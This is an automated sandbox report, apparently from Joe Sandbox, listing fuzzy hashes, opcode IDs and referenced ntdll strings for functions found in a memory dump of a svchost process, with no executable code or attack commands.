                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2180f589396b34569b08e319d4dd2269c4091aad90f29defeae03f7d29f7b261
                                                                    • Instruction ID: 15d84f0a9778d54dcbd78a151c4cb479ae79894ea73ae4188cf9042b3b12c521
                                                                    • Opcode Fuzzy Hash: 2180f589396b34569b08e319d4dd2269c4091aad90f29defeae03f7d29f7b261
                                                                    • Instruction Fuzzy Hash: A290027124140802D580B1584445747000687D0301F95D051A94E4558E86698ED5A665
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bfa9b0d0f1b2f23cd939fc55ea3f6e4bfb60791d37c263485117495c3cc80348
                                                                    • Instruction ID: ea1c73c9603ff0b066fa7c7f2d6cf7fd071ea66657571e50e74b140cca95986b
                                                                    • Opcode Fuzzy Hash: bfa9b0d0f1b2f23cd939fc55ea3f6e4bfb60791d37c263485117495c3cc80348
                                                                    • Instruction Fuzzy Hash: 0A90023164140902D541B1584445617000B87D0341FD5D062A54A4559ECA358A92E131
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a6618a977c3d137c293353346539855ed1166d5e2222734f13b3864cab25e66f
                                                                    • Instruction ID: 600f15569191b79578a31b699fdedfe06c6cd9e6ac9ee0c54e6a92ea94372839
                                                                    • Opcode Fuzzy Hash: a6618a977c3d137c293353346539855ed1166d5e2222734f13b3864cab25e66f
                                                                    • Instruction Fuzzy Hash: 3390023134140802D542B1584455607000AC7D1345FD5D052E58A4559D86358A53E132
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 14fd6b2d0a02cf0f70c4f1f631bc8faadfd28341b934c84450db85049680a92a
                                                                    • Instruction ID: 32f4956a30ef86e91bd923e267f2288ec572ad6b69c17a3f8448a313ac50ca42
                                                                    • Opcode Fuzzy Hash: 14fd6b2d0a02cf0f70c4f1f631bc8faadfd28341b934c84450db85049680a92a
                                                                    • Instruction Fuzzy Hash: A4900231251C0442D640B5684C55B07000687D0303F95D155A45D4558CC92589619521
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dfc1b2162786ef7f5d62f9bc15ae4757d1872f7bcfba6e7133d81680e176e6ea
                                                                    • Instruction ID: fbc489d7af9ef1343c8cba3a503cae77115b8854e7f99aa1f09855e2134abcc0
                                                                    • Opcode Fuzzy Hash: dfc1b2162786ef7f5d62f9bc15ae4757d1872f7bcfba6e7133d81680e176e6ea
                                                                    • Instruction Fuzzy Hash: 1B90023124180802D540B1584849747000687D0302F95D051A95E4559E8675C991A531
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad8c88d9bd85f9f7db8298d1d551b8fbc80b07e55ea46151b9733518a73f9a71
                                                                    • Instruction ID: fd34d389f7a954fed81fd4c0d8e4c9e30c0362f8d4158049d4ca80e8f7bfb5d7
                                                                    • Opcode Fuzzy Hash: ad8c88d9bd85f9f7db8298d1d551b8fbc80b07e55ea46151b9733518a73f9a71
                                                                    • Instruction Fuzzy Hash: 5C900231641404424580B16888859074006ABE1311795D161A4DD8554D856989659665
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8cc13b3c0eb18b7d28fd48c1490a534b9884702bc82c7c5770ed442c7c3fb6d2
                                                                    • Instruction ID: 3384d08d399bd7c076aa24cc84109a7423b4bd616ecf40208714d4ecf2d804ab
                                                                    • Opcode Fuzzy Hash: 8cc13b3c0eb18b7d28fd48c1490a534b9884702bc82c7c5770ed442c7c3fb6d2
                                                                    • Instruction Fuzzy Hash: 4390023124180802D540B158485570B000687D0302F95D051A55E4559D86358951A571
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a331d67ef7de3f05d2a54eb0c231c9dc888c32df26b61c89976c4d59de63b48c
                                                                    • Instruction ID: 3a8e445074ae930b2494d9aca0ba5d63d6420294f0263ac023216f46fb408663
                                                                    • Opcode Fuzzy Hash: a331d67ef7de3f05d2a54eb0c231c9dc888c32df26b61c89976c4d59de63b48c
                                                                    • Instruction Fuzzy Hash: CC90027125140442D544B1584445707004687E1301F95D052A65D4558CC5398D619125
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce5620094bea95652b6ce8856a9316e54af8a5b8c2c1a8c12da089bce732ae7d
                                                                    • Instruction ID: 6f8ed8c810d007b3cd7f91f1c90b3ad9472fd707955ef48750f3acf958cba2fc
                                                                    • Opcode Fuzzy Hash: ce5620094bea95652b6ce8856a9316e54af8a5b8c2c1a8c12da089bce732ae7d
                                                                    • Instruction Fuzzy Hash: 4690027138140842D540B1584455B070006C7E1301F95D055E54E4558D8629CD52A126
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 18e541a21ea3ce937743921de65d63a9fd3998928404f878f1662c0cfb3d4317
                                                                    • Instruction ID: fb7a17f837f9be7318b37edbb40eebe06527a1738f1e7617584f6715be11a726
                                                                    • Opcode Fuzzy Hash: 18e541a21ea3ce937743921de65d63a9fd3998928404f878f1662c0cfb3d4317
                                                                    • Instruction Fuzzy Hash: DC90023124140803D540B1585549707000687D0301F95E451A48A455CDD6668951A121
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ae6e32deb61cd036a4700afb5bb1c71ed3eef834e9a496c46f501b7605326d94
                                                                    • Instruction ID: 53aa46231820b1e238af960a335a8302bf6872374f7dff4608030bd0e1ba941f
                                                                    • Opcode Fuzzy Hash: ae6e32deb61cd036a4700afb5bb1c71ed3eef834e9a496c46f501b7605326d94
                                                                    • Instruction Fuzzy Hash: 4790023164540802D580B1585459707001687D0301F95E051A44A4558DC6698B55A6A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c2bb9c3e3954afc2b604e7c456a0a0eba132736ef78082ded0cebbe2a70e358c
                                                                    • Instruction ID: 525ca0f9c036b41c05c266604e829ca7ad49e93281848cdc6438eac5bba77fea
                                                                    • Opcode Fuzzy Hash: c2bb9c3e3954afc2b604e7c456a0a0eba132736ef78082ded0cebbe2a70e358c
                                                                    • Instruction Fuzzy Hash: 7690023124140802D540B5985449647000687E0301F95E051A94A4559EC6758991A131
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5cd286c10dbada5f919b012723d670bf353e00c8d6d75838670aaf80c988c7d4
                                                                    • Instruction ID: 96463ea1c6f456fe25634eb9f8b455ccfe88fe111957b245fe7349c0e249db32
                                                                    • Opcode Fuzzy Hash: 5cd286c10dbada5f919b012723d670bf353e00c8d6d75838670aaf80c988c7d4
                                                                    • Instruction Fuzzy Hash: 1790023124140C42D540B1584445B47000687E0301F95D056A45A4658D8625C951B521
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a550bedb60c372ab06ec555d2cabf21798103b0df057e13d51aad7a5d0ca25bf
                                                                    • Instruction ID: 8dda0f8b76e29c3980ba4c205db6f15a1fdbb22088eb41b084a3338c299f6e4d
                                                                    • Opcode Fuzzy Hash: a550bedb60c372ab06ec555d2cabf21798103b0df057e13d51aad7a5d0ca25bf
                                                                    • Instruction Fuzzy Hash: 3F90023124148C02D550B158844574B000687D0301F99D451A88A465CD86A58991B121
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eced3314379da6715fec14317b51772485697d6b52d4ff6646534a0be1e9d35c
                                                                    • Instruction ID: 79e8646f4a8390e89e5774684902135a953d78d46d44a91ff2e28cb789b8c9b4
                                                                    • Opcode Fuzzy Hash: eced3314379da6715fec14317b51772485697d6b52d4ff6646534a0be1e9d35c
                                                                    • Instruction Fuzzy Hash: 98900231282445525985F1584445507400797E03417D5D052A5894954C85369956D621
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ef769a11e3e44b8e5bb82c12025055a06fb48edcb56477c97d382ff402ab6789
                                                                    • Instruction ID: c01a245a86828ad7152d1ce027cf41182bde78f66d39948dfacc52cb4749dfeb
                                                                    • Opcode Fuzzy Hash: ef769a11e3e44b8e5bb82c12025055a06fb48edcb56477c97d382ff402ab6789
                                                                    • Instruction Fuzzy Hash: EB90023128140802D581B1584445607000A97D0341FD5D052A48A4558E86658B56EA61
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55dccbd7fc32f5d4659202c3eefdd78a9b9563b9854b3217f94c05090a8761aa
                                                                    • Instruction ID: 99d337e5690b889a094f55ba1640743d11bb8b788418a7c4ff5cc18f93e9f723
                                                                    • Opcode Fuzzy Hash: 55dccbd7fc32f5d4659202c3eefdd78a9b9563b9854b3217f94c05090a8761aa
                                                                    • Instruction Fuzzy Hash: 6890023134140403D580B15854596074006D7E1301F95E051E4894558CD92589569222
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cadce423721745d102fc166389027a394ec8ef6c79d304d91112eb4d1e28e7f0
                                                                    • Instruction ID: 2ebdddbbde4f397fd5314f511904c0adb374423ec8e6743459ce68004bb41e61
                                                                    • Opcode Fuzzy Hash: cadce423721745d102fc166389027a394ec8ef6c79d304d91112eb4d1e28e7f0
                                                                    • Instruction Fuzzy Hash: 2490023124544842D540B5585449A07000687D0305F95E051A54E4599DC6358951E131
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8b00c8a021999844e8ed0f2ddc3aebb6b8f72eb9a20222f543cf510b9c973e6f
                                                                    • Instruction ID: a4f71435f55d51a8797371bd426e48d79fc96809d9b1efc9a04734a4f1f4b022
                                                                    • Opcode Fuzzy Hash: 8b00c8a021999844e8ed0f2ddc3aebb6b8f72eb9a20222f543cf510b9c973e6f
                                                                    • Instruction Fuzzy Hash: A190023925340402D5C0B158544960B000687D1302FD5E455A449555CCC92589699321
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8fd39e2806af0c414d3ff3b49d42f8fd97662a01d008a9e2ccecb93355033839
                                                                    • Instruction ID: 53dbfe358c8d1118962ed07939d17b62557844e31f95fd8530da4414063a4e4a
                                                                    • Opcode Fuzzy Hash: 8fd39e2806af0c414d3ff3b49d42f8fd97662a01d008a9e2ccecb93355033839
                                                                    • Instruction Fuzzy Hash: A990023128140C02D580B15884557070007C7D0701F95D051A44A4558D86268A65A6B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e026043cd28c5564141d6e3632112f8c04c83b39f3aba1e9c63a904feb081847
                                                                    • Instruction ID: 3fdd75cf6b610bf871aa6ded493e6b33594630dd84b0a708f94d9ba3ad128bf7
                                                                    • Opcode Fuzzy Hash: e026043cd28c5564141d6e3632112f8c04c83b39f3aba1e9c63a904feb081847
                                                                    • Instruction Fuzzy Hash: 3A90023124184842D580B2584845B0F410687E1302FD5D059A85D6558CC92589559721
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d5e292adb557a9f72241fabd9eb4df563a1e2ea72c4c7591c474f86376dcd12
                                                                    • Instruction ID: 03cfbda01c75e5fbaecf77b3cc98e514a81f73d9f6509f034d262dda170a3660
                                                                    • Opcode Fuzzy Hash: 1d5e292adb557a9f72241fabd9eb4df563a1e2ea72c4c7591c474f86376dcd12
                                                                    • Instruction Fuzzy Hash: 3790023128545502D590B15C44456174006A7E0301F95D061A4C94598D85658955A221
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: 4efcb71dfb651f8d8c192371560c75c474818c55a012342e3e0663c852cbaec1
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: c0f7980197824d16b6055bc5180257f02a3fceba879ef3e24b561f0a1919785d
                                                                    • Instruction ID: 43e21d13167726aae54acfae821d490b5ada3b25696db514c928ac4801e36ca8
                                                                    • Opcode Fuzzy Hash: c0f7980197824d16b6055bc5180257f02a3fceba879ef3e24b561f0a1919785d
                                                                    • Instruction Fuzzy Hash: 5951DAB6A80216BFDB10DF98C890A7EF7B8BB08304754E169E999D7641D335DE44CBE0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 4ec8371d4a04d1757b510645aa69fa667e814640b871800a09e11368724083ed
                                                                    • Instruction ID: c977a833c77cc004ffd3216886b9707a9ba02b15d1ef596114b5b082492eba75
                                                                    • Opcode Fuzzy Hash: 4ec8371d4a04d1757b510645aa69fa667e814640b871800a09e11368724083ed
                                                                    • Instruction Fuzzy Hash: 98510471A80645AADF30DF9CC99097FB7FDAF44204B00D459EA9BC7681E774EA04CB60
                                                                    Strings
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02EA4725
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02EA4655
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02EA4742
                                                                    • ExecuteOptions, xrefs: 02EA46A0
                                                                    • Execute=1, xrefs: 02EA4713
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 02EA4787
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02EA46FC
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    • Opcode ID: b8d5d315476fb5e7386095512eb314091b51f45c6781d82d0e16a409332bfd47
                                                                    • Instruction ID: 187028bd7dffbd486e95c81c6e3da2a3fb5ba79ee3b6fd6da248a50cc3a408ff
                                                                    • Opcode Fuzzy Hash: b8d5d315476fb5e7386095512eb314091b51f45c6781d82d0e16a409332bfd47
                                                                    • Instruction Fuzzy Hash: 2F512931AC02196AEF119AA4DC99FFEB3B9EF0434DF04A0A9E505AB180D770AE45CF50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                    • Instruction ID: f949fdfad2760dc8d142d0cee31748a86dcd2448bf010feee5028ed9b3e090d3
                                                                    • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                    • Instruction Fuzzy Hash: F581B770E852499EEF24CFA8C8917FE7BB2AF4531CF18E25DE851A7290C7349940CB51
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$[$]:%u
                                                                    • API String ID: 48624451-2819853543
                                                                    • Opcode ID: b5e7e01aab0565496cf4869af94b7f50618a234e4011201e07431ea7223a4463
                                                                    • Instruction ID: efc82b931e4eea0f7b411b90614f3c157ee6dee3c4e4ab496341eb0ee42d6f03
                                                                    • Opcode Fuzzy Hash: b5e7e01aab0565496cf4869af94b7f50618a234e4011201e07431ea7223a4463
                                                                    • Instruction Fuzzy Hash: 3B215E76A40119ABDF10DF79C840AEEBBFDEF54748F049126EE46E3200E7309A058BA1
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02EA02E7
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02EA02BD
                                                                    • RTL: Re-Waiting, xrefs: 02EA031E
                                                                    Memory Dump Source
• Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
• Opcode ID: 885e5dbde6f683087bccbcc0b9d56abab0fab44485ff27304dc129a935d567a5
• Instruction ID: 56f0549c94e3b1e31fd462b7914d8a9a8b9596c80bed3ac1655294af4b63f119
• Opcode Fuzzy Hash: 885e5dbde6f683087bccbcc0b9d56abab0fab44485ff27304dc129a935d567a5
• Instruction Fuzzy Hash: ABE11130698741DFD724CF28C890B6AB7E0BF86318F109A2DF9958B6D1D774E844CB92
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EA728C
Strings
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02EA7294
• RTL: Re-Waiting, xrefs: 02EA72C1
• RTL: Resource at %p, xrefs: 02EA72A3
Memory Dump Source
• Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: 3de2987efe4bfb37b396a8b39c649edf24c9a504a14b123f8014b7f9b192df2b
• Instruction ID: 2a7a46ca9d29e0e8ca725817f09d643d1f066586bfb20cc992ef5d2d37a04dbe
• Opcode Fuzzy Hash: 3de2987efe4bfb37b396a8b39c649edf24c9a504a14b123f8014b7f9b192df2b
• Instruction Fuzzy Hash: F24106717C02029BD714DE24CC41B6AB7A6FF54758F10A629FD59EB640DB20F842CBE0
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 0181edf291c8c2da8a19337e0f1590407098e660d1b7637e8f79050d9039f1b0
• Instruction ID: fb9c78d61ac050d4178b97e0a61d8ffbc19b5679b2075a106e27bdd68dabb28b
• Opcode Fuzzy Hash: 0181edf291c8c2da8a19337e0f1590407098e660d1b7637e8f79050d9039f1b0
• Instruction Fuzzy Hash: C9318472A402199FDB20DF28DC40BEEB7FDEB44714F449556ED4AE3240EB309A448FA0
Strings
Memory Dump Source
• Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: e11ffb001295df07279e20f3e7b6ccf814c2b861ca3cb56aeb86afb493324ecd
• Instruction ID: 4a7b126493367a6f6948a09dc39886665364358ae148d473e66c5d4b9d7d487f
• Opcode Fuzzy Hash: e11ffb001295df07279e20f3e7b6ccf814c2b861ca3cb56aeb86afb493324ecd
• Instruction Fuzzy Hash: CF812C72D402699BDF358F54CC44BEEB7B8AF08754F0191EAAA09B7241D7705E84CFA0